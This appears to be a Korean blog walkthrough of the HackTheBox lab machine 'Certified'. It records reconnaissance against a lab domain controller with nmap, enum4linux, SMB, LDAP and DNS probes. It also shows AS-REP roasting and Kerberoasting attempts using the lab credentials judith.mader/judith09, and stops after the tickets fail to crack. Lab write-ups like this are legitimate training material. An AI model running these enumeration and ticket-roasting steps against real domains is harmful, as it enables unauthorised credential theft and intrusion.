정찰
┌──(root㉿P00075445-006)-[/home/surckers]
└─# nmap -p 53,88,135,139,389,445,464,592,636,3268,3269,9389,49666,49668,49685,49686,49689,49716,61104 -sCV --min-rate=10000 10.129.231.186
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-11 11:15 KST
Nmap scan report for 10.129.231.186
Host is up (0.29s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-11-11 09:15:54Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.certified.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.certified.htb
| Not valid before: 2024-05-13T15:49:36
|_Not valid after: 2025-05-13T15:49:36
|_ssl-date: 2024-11-11T09:17:29+00:00; +7h00m00s from scanner time.
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
592/tcp filtered eudora-set
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.certified.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.certified.htb
| Not valid before: 2024-05-13T15:49:36
|_Not valid after: 2025-05-13T15:49:36
|_ssl-date: 2024-11-11T09:17:30+00:00; +7h00m00s from scanner time.
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-11-11T09:17:29+00:00; +7h00m00s from scanner time.
| ssl-cert: Subject: commonName=DC01.certified.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.certified.htb
| Not valid before: 2024-05-13T15:49:36
|_Not valid after: 2025-05-13T15:49:36
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-11-11T09:17:30+00:00; +7h00m00s from scanner time.
| ssl-cert: Subject: commonName=DC01.certified.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.certified.htb
| Not valid before: 2024-05-13T15:49:36
|_Not valid after: 2025-05-13T15:49:36
9389/tcp open mc-nmf .NET Message Framing
49666/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49685/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49686/tcp open msrpc Microsoft Windows RPC
49689/tcp open msrpc Microsoft Windows RPC
49716/tcp open msrpc Microsoft Windows RPC
61104/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2024-11-11T09:16:49
|_ start_date: N/A
|_clock-skew: mean: 6h59m59s, deviation: 0s, median: 6h59m59s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 105.64 seconds
여러가지 시도
# enum4linux -a 10.129.231.186
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Mon Nov 11 13:54:59 2024
=========================================( Target Information )=========================================
Target ........... 10.129.231.186
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
===========================( Enumerating Workgroup/Domain on 10.129.231.186 )===========================
[E] Can't find workgroup/domain
===============================( Nbtstat Information for 10.129.231.186 )===============================
Looking up status of 10.129.231.186
No reply from 10.129.231.186
==================================( Session Check on 10.129.231.186 )==================================
[+] Server 10.129.231.186 allows sessions using username '', password ''
===============================( Getting domain SID for 10.129.231.186 )===============================
Domain Name: CERTIFIED
Domain Sid: S-1-5-21-729746778-2675978091-3820388244
[+] Host is part of a domain (not a workgroup)
==================================( OS information on 10.129.231.186 )==================================
[E] Can't get OS info with smbclient
[+] Got OS info for 10.129.231.186 from srvinfo:
do_cmd: Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED
======================================( Users on 10.129.231.186 )======================================
[E] Couldn't find users using querydispinfo: NT_STATUS_ACCESS_DENIED
[E] Couldn't find users using enumdomusers: NT_STATUS_ACCESS_DENIED
================================( Share Enumeration on 10.129.231.186 )================================
do_connect: Connection to 10.129.231.186 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Sharename Type Comment
--------- ---- -------
Reconnecting with SMB1 for workgroup listing.
Unable to connect with SMB1 -- no workgroup available
[+] Attempting to map shares on 10.129.231.186
===========================( Password Policy Information for 10.129.231.186 )===========================
[E] Unexpected error from polenum:
[+] Attaching to 10.129.231.186 using a NULL share
[+] Trying protocol 139/SMB...
[!] Protocol failed: Cannot request session (Called Name:10.129.231.186)
[+] Trying protocol 445/SMB...
[!] Protocol failed: SAMR SessionError: code: 0xc0000022 - STATUS_ACCESS_DENIED - {Access Denied} A process has requested access to an object but has not been granted those access rights.
[E] Failed to get password policy with rpcclient
======================================( Groups on 10.129.231.186 )======================================
[+] Getting builtin groups:
[+] Getting builtin group memberships:
[+] Getting local groups:
[+] Getting local group memberships:
[+] Getting domain groups:
[+] Getting domain group memberships:
=================( Users on 10.129.231.186 via RID cycling (RIDS: 500-550,1000-1050) )=================
[E] Couldn't get SID: NT_STATUS_ACCESS_DENIED. RID cycling not possible.
==============================( Getting printer info for 10.129.231.186 )==============================
do_cmd: Could not initialise spoolss. Error was NT_STATUS_ACCESS_DENIED
enum4linux complete on Mon Nov 11 13:56:10 2024
└─# echo -e "Administrator\nguest\nkrbtgt\nadmin\nbackup\nsupport\ntest\nuser\nhelpdesk\nmanager\nITadmin\nsqlservice\nwebadmin" > users.txt
┌──(root㉿P00075445-006)-[/home/surckers]
└─# impacket-GetNPUsers certified.htb/ -dc-ip 10.129.231.186 -no-pass -usersfile users.txt
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)└─# smbclient //10.129.231.186/IPC$ -N
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> rpcclient
rpcclient: command not found
smb: \> ls
NT_STATUS_ACCESS_DENIED listing \*
smb: \> help
? allinfo altname archive backup
blocksize cancel case_sensitive cd chmod
chown close del deltree dir
du echo exit get getfacl
geteas hardlink help history iosize
lcd link lock lowercase ls
l mask md mget mkdir
mkfifo more mput newer notify
open posix posix_encrypt posix_open posix_mkdir
posix_rmdir posix_unlink posix_whoami print prompt
put pwd q queue quit
readlink rd recurse reget rename
reput rm rmdir showacls setea
setmode scopy stat symlink tar
tarmode timeout translate unlock volume
vuid wdel logon listconnect showconnect
tcon tdis tid utimes logoff이건 가능
┌──(root㉿P00075445-006)-[/home/surckers]
└─# smbclient -L //10.129.231.186 -N --option='client min protocol=SMB2'
Anonymous login successful
Sharename Type Comment
--------- ---- -------
SMB1 disabled -- no workgroup available
┌──(root㉿P00075445-006)-[/home/surckers]
└─# smbclient -L //10.129.231.186 -N
Anonymous login successful
Sharename Type Comment
--------- ---- -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.129.231.186 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
┌──(root㉿P00075445-006)-[/home/surckers]
└─# dig axfr @10.129.231.186 certified.htb
; <<>> DiG 9.19.21-1+b1-Debian <<>> axfr @10.129.231.186 certified.htb
; (1 server found)
;; global options: +cmd
; Transfer failed.┌──(root㉿P00075445-006)-[/home/surckers]
└─# rpcclient -U "" 10.129.231.186
Password for [WORKGROUP\]:
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
└─# ldapsearch -x -H ldap://10.129.231.186 -b "dc=certified,dc=htb"
# extended LDIF
#
# LDAPv3
# base <dc=certified,dc=htb> with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#
# search result
search: 2
result: 1 Operations error
text: 000004DC: LdapErr: DSID-0C090C77, comment: In order to perform this opera
tion a successful bind must be completed on the connection., data 0, v4563
# numResponses: 1
계정정보가 있엇잖아... 어의가 없네
judith.mader / judith09
┌──(root㉿P00075445-006)-[/usr/lib/python3/dist-packages/impacket/krb5/Certipy]
└─# enum4linux -a -u judith.mader -p judith09 10.129.68.181
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Tue Nov 12 19:33:27 2024
=========================================( Target Information )=========================================
Target ........... 10.129.68.181
RID Range ........ 500-550,1000-1050
Username ......... 'judith.mader'
Password ......... 'judith09'
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
===========================( Enumerating Workgroup/Domain on 10.129.68.181 )===========================
[E] Can't find workgroup/domain
===============================( Nbtstat Information for 10.129.68.181 )===============================
Looking up status of 10.129.68.181
No reply from 10.129.68.181
===================================( Session Check on 10.129.68.181 )===================================
[+] Server 10.129.68.181 allows sessions using username 'judith.mader', password 'judith09'
================================( Getting domain SID for 10.129.68.181 )================================
Domain Name: CERTIFIED
Domain Sid: S-1-5-21-729746778-2675978091-3820388244
[+] Host is part of a domain (not a workgroup)
==================================( OS information on 10.129.68.181 )==================================
[E] Can't get OS info with smbclient
[+] Got OS info for 10.129.68.181 from srvinfo:
10.129.68.181 Wk Sv PDC Tim NT
platform_id : 500
os version : 10.0
server type : 0x80102b
=======================================( Users on 10.129.68.181 )=======================================
index: 0xeda RID: 0x1f4 acb: 0x00000210 Account: Administrator Name: (null) Desc: Built-in account for administering the computer/domain
index: 0xfec RID: 0x641 acb: 0x00000210 Account: alexander.huges Name: Alexander Huges Desc: (null)
index: 0xfb4 RID: 0x452 acb: 0x00000210 Account: ca_operator Name: Operator CA Desc: (null)
index: 0xfee RID: 0x643 acb: 0x00000210 Account: gregory.cameron Name: Gregory Cameron Desc: (null)
index: 0xedb RID: 0x1f5 acb: 0x00000215 Account: Guest Name: (null) Desc: Built-in account for guest access to the computer/domain
index: 0xfed RID: 0x642 acb: 0x00000210 Account: harry.wilson Name: Harry Wilson Desc: (null)
index: 0xfb1 RID: 0x44f acb: 0x00000210 Account: judith.mader Name: Judith Mader Desc: (null)
index: 0xf10 RID: 0x1f6 acb: 0x00020011 Account: krbtgt Name: (null) Desc: Key Distribution Center Service Account
index: 0xfb3 RID: 0x451 acb: 0x00000210 Account: management_svc Name: management service Desc: (null)
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[judith.mader] rid:[0x44f]
user:[management_svc] rid:[0x451]
user:[ca_operator] rid:[0x452]
user:[alexander.huges] rid:[0x641]
user:[harry.wilson] rid:[0x642]
user:[gregory.cameron] rid:[0x643]
=================================( Share Enumeration on 10.129.68.181 )=================================
do_connect: Connection to 10.129.68.181 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
Reconnecting with SMB1 for workgroup listing.
Unable to connect with SMB1 -- no workgroup available
[+] Attempting to map shares on 10.129.68.181
//10.129.68.181/ADMIN$ Mapping: DENIED Listing: N/A Writing: N/A
//10.129.68.181/C$ Mapping: DENIED Listing: N/A Writing: N/A
[E] Can't understand response:
NT_STATUS_NO_SUCH_FILE listing \*
//10.129.68.181/IPC$ Mapping: N/A Listing: N/A Writing: N/A
//10.129.68.181/NETLOGON Mapping: OK Listing: OK Writing: N/A
//10.129.68.181/SYSVOL Mapping: OK Listing: OK Writing: N/A
===========================( Password Policy Information for 10.129.68.181 )===========================
[+] Attaching to 10.129.68.181 using judith.mader:judith09
[+] Trying protocol 139/SMB...
[!] Protocol failed: Cannot request session (Called Name:10.129.68.181)
[+] Trying protocol 445/SMB...
[+] Found domain(s):
[+] CERTIFIED
[+] Builtin
[+] Password Info for Domain: CERTIFIED
[+] Minimum password length: 7
[+] Password history length: 24
[+] Maximum password age: 41 days 23 hours 53 minutes
[+] Password Complexity Flags: 000000
[+] Domain Refuse Password Change: 0
[+] Domain Password Store Cleartext: 0
[+] Domain Password Lockout Admins: 0
[+] Domain Password No Clear Change: 0
[+] Domain Password No Anon Change: 0
[+] Domain Password Complex: 0
[+] Minimum password age: 1 day 4 minutes
[+] Reset Account Lockout Counter: 10 minutes
[+] Locked Account Duration: 10 minutes
[+] Account Lockout Threshold: None
[+] Forced Log off Time: Not Set
[+] Retieved partial password policy with rpcclient:
Password Complexity: Disabled
Minimum Password Length: 7
======================================( Groups on 10.129.68.181 )======================================
[+] Getting builtin groups:
group:[Server Operators] rid:[0x225]
group:[Account Operators] rid:[0x224]
group:[Pre-Windows 2000 Compatible Access] rid:[0x22a]
group:[Incoming Forest Trust Builders] rid:[0x22d]
group:[Windows Authorization Access Group] rid:[0x230]
group:[Terminal Server License Servers] rid:[0x231]
group:[Administrators] rid:[0x220]
group:[Users] rid:[0x221]
group:[Guests] rid:[0x222]
group:[Print Operators] rid:[0x226]
group:[Backup Operators] rid:[0x227]
group:[Replicator] rid:[0x228]
group:[Remote Desktop Users] rid:[0x22b]
group:[Network Configuration Operators] rid:[0x22c]
group:[Performance Monitor Users] rid:[0x22e]
group:[Performance Log Users] rid:[0x22f]
group:[Distributed COM Users] rid:[0x232]
group:[IIS_IUSRS] rid:[0x238]
group:[Cryptographic Operators] rid:[0x239]
group:[Event Log Readers] rid:[0x23d]
group:[Certificate Service DCOM Access] rid:[0x23e]
group:[RDS Remote Access Servers] rid:[0x23f]
group:[RDS Endpoint Servers] rid:[0x240]
group:[RDS Management Servers] rid:[0x241]
group:[Hyper-V Administrators] rid:[0x242]
group:[Access Control Assistance Operators] rid:[0x243]
group:[Remote Management Users] rid:[0x244]
group:[Storage Replica Administrators] rid:[0x246]
[+] Getting builtin group memberships:
Group: Remote Management Users' (RID: 580) has member: CERTIFIED\management_svc
Group: Users' (RID: 545) has member: NT AUTHORITY\INTERACTIVE
Group: Users' (RID: 545) has member: NT AUTHORITY\Authenticated Users
Group: Users' (RID: 545) has member: CERTIFIED\Domain Users
Group: Pre-Windows 2000 Compatible Access' (RID: 554) has member: NT AUTHORITY\Authenticated Users
Group: Pre-Windows 2000 Compatible Access' (RID: 554) has member: CERTIFIED\DC01$
Group: Windows Authorization Access Group' (RID: 560) has member: NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERS
Group: Certificate Service DCOM Access' (RID: 574) has member: NT AUTHORITY\Authenticated Users
Group: Print Operators' (RID: 550) has member: Could not initialise pipe samr. Error was NT_STATUS_INVALID_NETWORK_RESPONSE
Group: Guests' (RID: 546) has member: CERTIFIED\Guest
Group: Guests' (RID: 546) has member: CERTIFIED\Domain Guests
Group: Administrators' (RID: 544) has member: CERTIFIED\Administrator
Group: Administrators' (RID: 544) has member: CERTIFIED\Enterprise Admins
Group: Administrators' (RID: 544) has member: CERTIFIED\Domain Admins
[+] Getting local groups:
group:[Cert Publishers] rid:[0x205]
group:[RAS and IAS Servers] rid:[0x229]
group:[Allowed RODC Password Replication Group] rid:[0x23b]
group:[Denied RODC Password Replication Group] rid:[0x23c]
group:[DnsAdmins] rid:[0x44d]
[+] Getting local group memberships:
Group: Denied RODC Password Replication Group' (RID: 572) has member: CERTIFIED\krbtgt
Group: Denied RODC Password Replication Group' (RID: 572) has member: CERTIFIED\Domain Controllers
Group: Denied RODC Password Replication Group' (RID: 572) has member: CERTIFIED\Schema Admins
Group: Denied RODC Password Replication Group' (RID: 572) has member: CERTIFIED\Enterprise Admins
Group: Denied RODC Password Replication Group' (RID: 572) has member: CERTIFIED\Cert Publishers
Group: Denied RODC Password Replication Group' (RID: 572) has member: CERTIFIED\Domain Admins
Group: Denied RODC Password Replication Group' (RID: 572) has member: CERTIFIED\Group Policy Creator Owners
Group: Denied RODC Password Replication Group' (RID: 572) has member: CERTIFIED\Read-only Domain Controllers
Group: Cert Publishers' (RID: 517) has member: CERTIFIED\DC01$
[+] Getting domain groups:
group:[Enterprise Read-only Domain Controllers] rid:[0x1f2]
group:[Domain Admins] rid:[0x200]
group:[Domain Users] rid:[0x201]
group:[Domain Guests] rid:[0x202]
group:[Domain Computers] rid:[0x203]
group:[Domain Controllers] rid:[0x204]
group:[Schema Admins] rid:[0x206]
group:[Enterprise Admins] rid:[0x207]
group:[Group Policy Creator Owners] rid:[0x208]
group:[Read-only Domain Controllers] rid:[0x209]
group:[Cloneable Domain Controllers] rid:[0x20a]
group:[Protected Users] rid:[0x20d]
group:[Key Admins] rid:[0x20e]
group:[Enterprise Key Admins] rid:[0x20f]
group:[DnsUpdateProxy] rid:[0x44e]
group:[Management] rid:[0x450]
[+] Getting domain group memberships:
Group: 'Management' (RID: 1104) has member: CERTIFIED\management_svc
Group: 'Schema Admins' (RID: 518) has member: CERTIFIED\Administrator
Group: 'Domain Guests' (RID: 514) has member: CERTIFIED\Guest
Group: 'Group Policy Creator Owners' (RID: 520) has member: CERTIFIED\Administrator
Group: 'Domain Admins' (RID: 512) has member: CERTIFIED\Administrator
Group: 'Domain Users' (RID: 513) has member: CERTIFIED\Administrator
Group: 'Domain Users' (RID: 513) has member: CERTIFIED\krbtgt
Group: 'Domain Users' (RID: 513) has member: CERTIFIED\judith.mader
Group: 'Domain Users' (RID: 513) has member: CERTIFIED\management_svc
Group: 'Domain Users' (RID: 513) has member: CERTIFIED\ca_operator
Group: 'Domain Users' (RID: 513) has member: CERTIFIED\alexander.huges
Group: 'Domain Users' (RID: 513) has member: CERTIFIED\harry.wilson
Group: 'Domain Users' (RID: 513) has member: CERTIFIED\gregory.cameron
Group: 'Enterprise Admins' (RID: 519) has member: CERTIFIED\Administrator
Group: 'Domain Controllers' (RID: 516) has member: CERTIFIED\DC01$
==================( Users on 10.129.68.181 via RID cycling (RIDS: 500-550,1000-1050) )==================
[I] Found new SID:
S-1-5-21-729746778-2675978091-3820388244
[I] Found new SID:
S-1-5-21-729746778-2675978091-3820388244
[I] Found new SID:
S-1-5-32
[I] Found new SID:
S-1-5-32
[I] Found new SID:
S-1-5-32
[I] Found new SID:
S-1-5-32
[I] Found new SID:
S-1-5-32
[I] Found new SID:
S-1-5-32
[I] Found new SID:
S-1-5-32
[I] Found new SID:
S-1-5-32
[+] Enumerating users using SID S-1-5-82-3006700770-424185619-1745488364-794895919 and logon username 'judith.mader', password 'judith09'
[+] Enumerating users using SID S-1-5-80-3139157870-2983391045-3678747466-658725712 and logon username 'judith.mader', password 'judith09'
[+] Enumerating users using SID S-1-5-32 and logon username 'judith.mader', password 'judith09'
S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)
[+] Enumerating users using SID S-1-5-90 and logon username 'judith.mader', password 'judith09'
Kerberoasting 공격을 통해 TGS 티켓은 획득 했으나, crack 안됨
python3 /usr/share/doc/python3-impacket/examples/GetUserSPNs.py certified.htb/judith.mader:judith09 -dc-ip 10.129.68.181 -request'Hacking > HackTheBox' 카테고리의 다른 글
| Sniper (0) | 2025.03.27 |
|---|---|
| Administrator (1) | 2024.11.26 |
| aragog (Linux) (1) | 2024.11.04 |
| Devel (win) (1) | 2024.10.23 |
| MonitorsThree (Linux · Medium) (1) | 2024.09.25 |
